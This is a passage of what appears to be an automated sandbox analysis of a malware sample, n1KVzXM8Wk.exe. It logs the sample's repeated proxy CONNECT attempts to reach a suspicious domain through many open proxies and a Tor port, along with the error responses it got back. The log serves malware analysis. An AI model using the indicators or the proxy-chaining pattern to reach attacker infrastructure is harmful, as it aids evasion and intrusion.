                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:02.381144047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:04.019308090 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1302192.168.2.4537248.219.97.248806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.338423967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.700354099 CET743INHTTP/1.1 502 Bad Gateway
                                                                                                      Server: Tengine
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 596
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 69 7a 74 34 6e 66 33 77 73 39 30 37 62 63 79 6e 6a 71 6e 77 77 39 7a 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 44 61 74 65 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 32 30 32 34 2f 30 32 2f 32 33 20 31 36 3a 34 35 3a 32 36 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://heygirlisheeverythingyouwantedinaman.com</td></tr><tr><td>Server:</td><td>izt4nf3ws907bcynjqnww9z</td></tr><tr><td>Date:</td><td>2024/02/23 16:45:26</td></tr></table><hr/>Powered by Tengine<hr><center>tengine</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1303192.168.2.45312872.195.34.5841456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.339301109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.865756035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.366033077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1304192.168.2.453037162.253.68.9741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.350426912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1305192.168.2.453252146.190.85.7931286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.383949041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.813910961 CET536INHTTP/1.1 503 Service Unavailable
                                                                                                      Server: squid/4.6
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 3702
                                                                                                      X-Squid-Error: ERR_DNS_FAIL 0
                                                                                                      Vary: Accept-Language
                                                                                                      Content-Language: en
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERRO


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1306192.168.2.453503112.30.155.83127926812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.384006977 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.048614025 CET39INHTTP/1.1 200 Connection established
                                                                                                      Feb 23, 2024 09:45:28.601264954 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1307192.168.2.453741161.189.182.14531286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.414385080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.827486038 CET147INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                      Server: squid/4.14
                                                                                                      Content-Length: 0
                                                                                                      Feb 23, 2024 09:45:27.212523937 CET628INHTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy54-HG100-1</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></html
                                                                                                      Data Raw:
                                                                                                      Data Ascii:
                                                                                                      Feb 23, 2024 09:45:27.218698978 CET628INHTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy50-HG100-1</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></html
                                                                                                      Data Raw:
                                                                                                      Data Ascii:


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1308192.168.2.453722113.204.4.142108006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.415549040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1309192.168.2.45378045.138.87.23810806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.459944963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1310192.168.2.4537558.217.187.52240026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.460683107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1311192.168.2.45340192.204.134.38597276812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.474375963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.475100040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1312192.168.2.45377859.6.26.121806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.474483967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1313192.168.2.45332231.169.80.16510806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.506145954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1314192.168.2.45379651.158.64.130163796812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.531512976 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.129618883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.700229883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.716589928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.088380098 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                      Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1315192.168.2.453362190.202.48.182806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.538736105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1316192.168.2.4533675.161.98.204581996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.549014091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.943728924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.342824936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.944155931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.147305965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.377154112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.647344112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.147325039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1317192.168.2.45064391.134.140.160573206812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.557846069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1318192.168.2.453779103.216.49.15180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.563937902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1319192.168.2.453408192.99.169.1984446812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.564404011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1320192.168.2.452913104.247.164.179550426812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.579725027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.680643082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1321192.168.2.453277194.233.78.142398336812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.593408108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.647001028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1322192.168.2.453574186.215.87.19460146812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.606045961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.178615093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.680639029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.577758074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1323192.168.2.453301191.37.155.13556786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.633577108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1324192.168.2.453411163.172.169.27163796812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.635082006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.680643082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.681605101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.681468010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1325192.168.2.453936129.226.92.2304436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.666008949 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1326192.168.2.453938129.226.92.2304436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.667326927 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1327192.168.2.453939129.226.92.2304436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.668076992 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1328192.168.2.453941129.226.92.2304436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.668914080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1329192.168.2.452937178.62.229.2831286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
